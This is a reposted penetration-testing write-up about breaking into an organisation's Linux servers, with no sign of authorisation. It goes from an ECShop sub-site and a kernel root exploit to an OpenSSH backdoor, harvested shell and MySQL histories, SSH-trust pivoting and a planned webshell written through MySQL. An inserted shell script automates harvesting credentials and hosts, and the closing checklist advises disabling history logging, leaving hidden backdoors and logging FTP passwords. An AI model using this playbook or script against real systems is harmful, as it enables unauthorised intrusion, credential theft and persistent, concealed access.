Notes from One Linux Penetration

Source: Internet
Author: User
Tags: password book, rsync

This article is reposted from 91ri.org.

Reconnaissance

The target domain is xx.com.

Our target is the main site. A main site is usually well hardened, so we go straight for the second-level subdomains; with luck you find an open-source CMS, with better luck something like DedeCMS, and then ...

We enumerate its domain names directly and look at the sub-sites first. Since the target is fairly large, we guess it has an intranet, so the plan is to take down an intranet machine first and pivot from there.

Analysis and taking a sub-site

Enumeration turned up quite a few sub-sites. Looking through them, server 10 runs ECShop, exactly as shipped, and ECShop goes down easily.

Dug out the database config file. Good luck: the site connects to MySQL as root.

    uname -a
    Linux 2.6.32-71.el6.i686 #1 SMP Fri Nov 04:17:17 GMT i686 i686 i386 GNU/Linux

That kernel (the original CentOS 6.0 one) has public local privilege-escalation exploits; upload one and get root directly.

After some analysis this host turned out to be on the public network rather than the intranet. Our target is x.x.x.8; the machine we now control is x.x.x.10.

Installed an OpenSSH backdoor: a patched sshd that accepts two root passwords, the admin's real one and our backdoor one, without affecting the admin's password. (Available online; download it yourself.)

    cat /etc/issue
    CentOS Linux release 6.0 (Final)
    Kernel \r on an \m

I wanted to install a PAM password logger as well, but didn't have a backdoor on hand that supports 6.0.

Going deeper

Analysis showed that servers 7 and 8 do load balancing or rsync synchronization for the site; most likely load balancing, since they stay in sync.

Let's see what processes are running:

    ps aux

Apart from Apache and MySQL, it also runs

    /usr/sbin/vsftpd

The FTP service is up, so we could install an FTP password logger, but I'm too lazy to wait for the admin to log in, so let's work on other things first. (91ri.org note: in general, when one administrator maintains the whole network, the same passwords work everywhere; in a long-term penetration, collecting and analysing a few more passwords often pays off many times over.)

Look at the administrator's shell history; there may be sensitive information in it:

    cat .bash_history | more

It shows that this host has been talking to target server 8, and to 15:

    scp -rp root@x.x.x.8:/etc/httpd/conf /etc/httpd/
    scp -rp root@x.x.x.15:/var/lib/mysql/appcms /var/lib/mysql
    ssh x.x.x.13

Many Linux administrators feel that Linux is secure by itself and pay little attention to hardening, and they all like to set up SSH trust relationships (key-based logins between hosts), so we suspect this server has one too.

    [root@10 ~]# ls .ssh/
    authorized_keys  known_hosts

    cat .ssh/known_hosts
    x.x.x.13 ssh-rsa baaab3nzac1yc2eaaaabiwaaaqeawcxcmgxzxoeiuhkhasi9dw9kilxxpdcsifv/eyble1jcks44tljppgmeqvbvbqj4fytrescpgrwwolrmaecye17mdnezdaorq392ucmdulg3vz4zzkh8+9hfrnnlmbrrqpatifwwxlkushoiqbrv+pgf49v5vykqyzm/01fbhtzdscfizsxeyl/oisuzpb2l9qzp+0xinwf1rrcv78tv2vsn74yin47ieqifk8lmfhoev1xa31/vkmfx8c8stmhedomebafxo3wzbq/xj5ftrrfj1wyo06lgojgp6svpqor8zm8itpdtwrg2nmwsrzc6egopx1yi9cv23nxzam/b/q==

Sadly, this host only has a trust relationship with 13, so next we SSH to 13. Although 13 is not the main site, we may be able to collect some admin information there that leads straight to the target.

The roundabout way

Once on 13, plant a backdoor as before.

Keep reading the admin's command history, and while at it also search for .sh files: some admins write shell scripts to make their work easier, and there are always good things in them.

Take a look at the MySQL command history:

    cat .mysql_history

Found it:

    grant all privileges on *.* to 'root'@'%' identified by '***vrlmm' with grant option;
    flush privileges;

Suddenly I noticed the MySQL password is the same as on 10, so I guessed the target server uses it too. An nmap scan of 8 to check whether 3306 is open showed that it is, and it does use the same password. (91ri.org note: as confirmed earlier, someone who manages one machine and someone who manages 10 or 100 machines work differently; after all, you can't consult a password book for every single host, can you?)
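The two harvesting steps above (reading .bash_history and .ssh/known_hosts on server 10, and .mysql_history plus any .sh scripts on 13) are the same routine every time, so here it is as a script. This is an added example, not code from the original article or from 91ri.org. It builds a constructed home directory with made-up history files (RFC 5737 documentation addresses and fake passwords) and pulls out the leads the write-up found by hand: the hosts the admin has jumped to, the lines that carry credentials, and rsync scripts together with the password files they point at. It also covers two caveats the article skips: a client with HashKnownHosts enabled writes hashed known_hosts entries that give away no targets, and older mysql clients write spaces in .mysql_history as \040, so the file must be decoded before grepping.

```shell
#!/bin/sh
# Added example (not from the original article): harvest lateral-movement leads
# from a Linux home directory the way the write-up does by hand.
# All sample data is constructed; hosts are RFC 5737 addresses, passwords are fake.

# Build a constructed home directory holding the artefact types the article reads.
setup_sample_home() {
  home=$1
  mkdir -p "$home/.ssh" "$home/scripts"
  cat > "$home/.bash_history" <<'EOF'
uname -a
scp -rp root@192.0.2.8:/etc/httpd/conf /etc/httpd/
scp -rp root@192.0.2.15:/var/lib/mysql/appcms /var/lib/mysql
ssh 192.0.2.13
rsync -avz --password-file=/root/.rsyncpass backup@192.0.2.7::www /var/www/
mysql -uroot -pS3cret -h 192.0.2.8
export HISTFILE=/dev/null
EOF
  # One plain-text entry and one hashed entry (what "HashKnownHosts yes" produces).
  cat > "$home/.ssh/known_hosts" <<'EOF'
192.0.2.13 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAexampleonly==
|1|Zm9vYmFyYmF6cXV4cXV1eGZvb2Jhcg==|YmFyZm9vcXV4YmF6Zm9vYmFycXV1eA== ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAhashedexample==
EOF
  # Older mysql clients store spaces as \040; the GRANT line uses that form.
  cat > "$home/.mysql_history" <<'EOF'
show databases;
grant\040all\040privileges\040on\040*.*\040to\040'root'@'%'\040identified\040by\040'Pa55w0rd!'\040with\040grant\040option;
flush privileges;
EOF
  printf 'rsyncsecret\n' > "$home/.rsyncpass"
  cat > "$home/scripts/sync.sh" <<EOF
#!/bin/sh
rsync -az --password-file=$home/.rsyncpass web@192.0.2.7::site /var/www/html/
EOF
}

# IPv4 hosts reached with ssh/scp/rsync/mysql (user@ stripped), deduplicated.
# Hostnames are ignored; the write-up only deals with bare addresses.
history_hosts() {
  grep -E '^(ssh|scp|rsync|mysql) ' "$1" \
    | grep -oE '([A-Za-z0-9_.-]+@)?[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' \
    | sed 's/^.*@//' | sort -u
}

# Lines that carry a secret: mysql -pPASS, rsync --password-file=..., GRANT ... IDENTIFIED BY.
# Decode \040 first so escaped .mysql_history files match as well.
credential_lines() {
  sed 's/\\040/ /g' "$@" \
    | grep -iE 'identified by|--password-file=|(^| )-p[^ ]+|password='
}

# Plain-text known_hosts entries (first field, possibly a comma list) reveal the hop
# targets; hashed entries (|1|salt|hash) reveal nothing and are only counted.
known_hosts_plain() {
  grep -v '^|1|' "$1" | grep -v '^#' | awk '{print $1}' | tr ',' '\n' | sort -u
}
known_hosts_hashed_count() {
  grep '^|1|' "$1" | wc -l | tr -d ' '
}

# Shell scripts that run rsync with a stored password, and the secret each names
# when it is readable (rsync --password-file contents are plain text).
rsync_secrets() {
  find "$1" -name '*.sh' -exec grep -ohE -- '--password-file=[^ ]+' {} + \
    | sed 's/^--password-file=//' | sort -u \
    | while read -r f; do
        if [ -r "$f" ]; then
          printf '%s: %s\n' "$f" "$(cat "$f")"
        fi
      done
}

# Print the whole report for one home directory.
triage_home() {
  h=$1
  echo "== hosts seen in $h/.bash_history =="
  history_hosts "$h/.bash_history"
  echo "== plain-text known_hosts targets ($(known_hosts_hashed_count "$h/.ssh/known_hosts") hashed entries skipped) =="
  known_hosts_plain "$h/.ssh/known_hosts"
  echo "== credential-bearing history lines =="
  credential_lines "$h/.bash_history" "$h/.mysql_history"
  echo "== rsync password files named in scripts =="
  rsync_secrets "$h"
}

# Stand-alone demo against the constructed home directory.
demo_home=$(mktemp -d)
setup_sample_home "$demo_home"
triage_home "$demo_home"
rm -rf "$demo_home"
```

On a real box you would point triage_home at /root and at every home directory under /home. The same script doubles as a hygiene check from the defensive side: if known_hosts_plain prints anything, the client is not using HashKnownHosts, and if credential_lines prints anything, passwords have been typed on the command line or in GRANT statements and are sitting in history files that any later compromise will read.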

There was also this record on the first server, 10:

    scp -rp root@x.x.x.8:/etc/httpd/conf /etc/httpd/

This confirms that Apache on 8 is a default install, so the web root path is known; with the MySQL root account reachable from outside, a webshell can be written straight into that path through MySQL.

Done

Summary
    • When a server is taken down, run export HISTFILE=/dev/null immediately after logging in so that our commands are not recorded in .bash_history (the variable name is case-sensitive).
    • Dig through .mysql_history and .bash_history.
    • ls -al to see what hidden files are in the home directory, such as .ssh, .vnc and so on. VNC is great, you know.
    • Look in .ssh/ for SSH connection records and the like; also look at the global environment files.
    • Find the shell scripts on the server; many contain rsync synchronization scripts and similar.
    • Check the processes, assuming you know a little Linux. If rsync is running on the host, you are basically set: its password files and secrets file are plain text.
    • In an intranet environment, if you don't know where the main target is, nslookup the domain name to see whether it resolves to an intranet address.
    • In an intranet environment, if an FTP service is running, backdoor it to log FTP passwords, collect information, and wait for the admin to log in.
    • Use tcpdump.
    • Leave a hidden backdoor.
    • Once you have access, repeat the information gathering above on the other machines; nmap is recommended.

91ri.org: The article was written rather chaotically, so I tidied it up a little. The author's approach is good and worth studying for readers just learning Linux penetration. Also recommended on the same topic: "Summary of some Linux penetration techniques" and "Advanced nmap usage in practice".
